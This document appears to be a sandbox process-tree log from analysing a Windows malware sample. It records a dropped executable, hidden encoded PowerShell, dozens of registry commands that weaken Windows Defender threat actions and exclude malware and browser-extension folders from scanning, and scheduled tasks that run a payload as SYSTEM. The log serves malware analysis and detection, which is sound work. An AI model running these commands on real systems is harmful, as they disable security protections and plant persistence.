C:\Users\Admin\Pictures\iJlEkkLqIhtnHVfNj6uUp1Lx.exeC:\Users\Admin\Pictures\iJlEkkLqIhtnHVfNj6uUp1Lx.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2e0,0x2f0,0x2f4,0x2bc,0x2f8,0x6fcc9558,0x6fcc9564,0x6fcc95701⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1148 -ip 11481⤵PID:504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1148 -ip 11481⤵PID:2944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1148 -ip 11481⤵PID:748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1148 -ip 11481⤵PID:568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1148 -ip 11481⤵
- UAC bypass
- Windows security bypass
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1148 -ip 11481⤵PID:1068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1148 -ip 11481⤵PID:4072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1148 -ip 11481⤵PID:3532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2952 -ip 29521⤵PID:3048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2952 -ip 29521⤵PID:4924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1148 -ip 11481⤵PID:3588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1148 -ip 11481⤵PID:4152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1148 -ip 11481⤵PID:2308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1148 -ip 11481⤵PID:4372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1148 -ip 11481⤵PID:1700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2928
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3412
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1148 -ip 11481⤵PID:3976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:5016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1148 -ip 11481⤵PID:3556
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1088
-
C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\wAuDLfm.exeC:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\wAuDLfm.exe Lc /dqsite_idXjO 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1748 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3720
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2856
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2440
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:460
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tisqMnSmFJrmHkYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tisqMnSmFJrmHkYA\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TewsSzADpkOsC" /t REG_DWORD /d 0 /reg:323⤵PID:3596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cAagwmwWSSyWmtVB /t REG_DWORD /d 0 /reg:643⤵PID:3392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tisqMnSmFJrmHkYA /t REG_DWORD /d 0 /reg:643⤵PID:4148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tisqMnSmFJrmHkYA /t REG_DWORD /d 0 /reg:323⤵PID:4580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih /t REG_DWORD /d 0 /reg:643⤵
- Suspicious use of WriteProcessMemory
PID:3412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih /t REG_DWORD /d 0 /reg:323⤵PID:2376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cAagwmwWSSyWmtVB /t REG_DWORD /d 0 /reg:323⤵PID:4216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hzVOasbgcFlU2" /t REG_DWORD /d 0 /reg:643⤵PID:2920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hzVOasbgcFlU2" /t REG_DWORD /d 0 /reg:323⤵PID:1380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZmXCVzpeviUn" /t REG_DWORD /d 0 /reg:643⤵PID:3192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZmXCVzpeviUn" /t REG_DWORD /d 0 /reg:323⤵PID:1232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TewsSzADpkOsC" /t REG_DWORD /d 0 /reg:643⤵PID:3692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR" /t REG_DWORD /d 0 /reg:643⤵PID:3584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR" /t REG_DWORD /d 0 /reg:323⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:643⤵PID:5056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:323⤵PID:1532
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqTjykAuP"2⤵PID:3556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqTjykAuP" /SC once /ST 02:13:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XwMyCejzLOqQPkTJD"2⤵PID:572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XwMyCejzLOqQPkTJD" /SC once /ST 03:43:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\tisqMnSmFJrmHkYA\kiXpwMNefFEyhlW\SpBYaRE.exe\" Pt /Cmsite_idjcy 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqTjykAuP"2⤵PID:1512
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:3088
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force1⤵PID:3584
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2720
-
